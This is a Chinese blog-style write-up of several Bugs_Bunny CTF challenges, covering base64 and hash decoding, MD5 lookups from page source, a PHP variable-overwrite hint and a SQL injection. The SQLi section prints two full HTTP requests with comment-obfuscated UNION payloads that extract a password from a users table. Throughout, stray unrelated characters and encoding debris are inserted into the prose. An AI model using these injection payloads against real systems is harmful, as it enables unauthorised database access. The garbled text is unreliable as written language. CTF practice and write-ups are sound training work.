0x00 寫在前面

國外的比賽课锌，關(guān)注下ctf time庭再，就能收到國外一些比賽的信息士八，看看也是非常不錯的選擇裙秋。

這個比賽個人感覺挺有質(zhì)量的琅拌，自己太菜了好多寫不來

0x01 部分WP

1. Nothing here

QnVnc19CdW5ueXs1MjljNDI5YWJkZTIxNzFkMGEyNTU4NDQ3MmFmODIxN30K

Bugs_Bunny{529c429abde2171d0a25584472af8217}

2. Encryption

修改agent，得到兩個hash摘刑，

zn8XhqnlBRBetevoFcSQAw0OMVH6Kwj23svbneF1%2B5gDfBdn9osZBfB06cTub4ARg3OTTjsBIG7x

zn8XhqnlBRBetevoFcSQAw0OMVH6Kwj23svbneF1+5gDfBdn9osZBfB06cTub4ARg3OTTjsBIG7x

這兩個hash要怎么kill? 不是很懂題目什么套路

2017 7 31更新：

https://hashkiller.co.uk/text-encryption.aspx

password為：Hashkiller

3. Web100

查看DOM进宝，然后解md5

_

"6b07fd4ea837c39e1542e1bbca01a224"

__

"20ee80e63596799a1543bc9fd88d8878"

___

"21232f297a57a5a743894a0e4a801fc3"

從DOM目錄里面看到這幾md5，去解密枷恕，看下面幾行就好了党晋。

flag的字符順序一一對應(yīng)，從h[0]開始找徐块。

看懂這一部分就OK未玻，

tunisia bunny? admin

inininynusutdamba

Bugs_Bunny{inininynusutdamba}

4.　SimplePHP

題目很贊，有個兩個關(guān)鍵就是覆蓋POST和覆蓋原來上面定義的兩個變量胡控。

5. SQLI

這注入我是不想說什么了扳剿。無fuck說。

GET /LQI_X/?username=a'-0-'&password='or/**/1/**/union/**/select/**/'z'/**/order/**/by/**/1--&login=login HTTP/1.1

Host: 34.253.165.46

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Connection: close

Upgrade-Insecure-Requests: 1

GET /LQI_X/?username=a'-1-'&password='or/**/0/**/union/**/select/**/(select/**/password/**/from/**/users/**/limit/**/3,1)/**/--&login=login HTTP/1.1

Host: 34.253.165.46

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Connection: close

Upgrade-Insecure-Requests: 1

Bugs_Bunny{SQLi_Easy_I_Dont_Think}

_Easy_I_Dont_Think}}

Bugs_Bunny{SQLi_Easy_!!_I_Dont_Think}

_Easy_I_Dont_Think

username位置過濾比較嚴(yán)苛昼激，在password注入庇绽，題目限制比較坑锡搜。最后flag我去提交都不對，有毒瞧掺。

0x02 小結(jié)

只看了下web余爆，只肝得出來這幾題，不知道國外的那些什么套路夸盟，比較菜，這里只是寫了答案像捶，有一起玩了的小伙伴有疑問的可以留言一起學(xué)習(xí)上陕。

比賽平臺不知道后面還開不開，wp出來之后有時間再詳細(xì)分析幾題吧拓春。

題目挺nice的释簿。

唉自己要努力啊。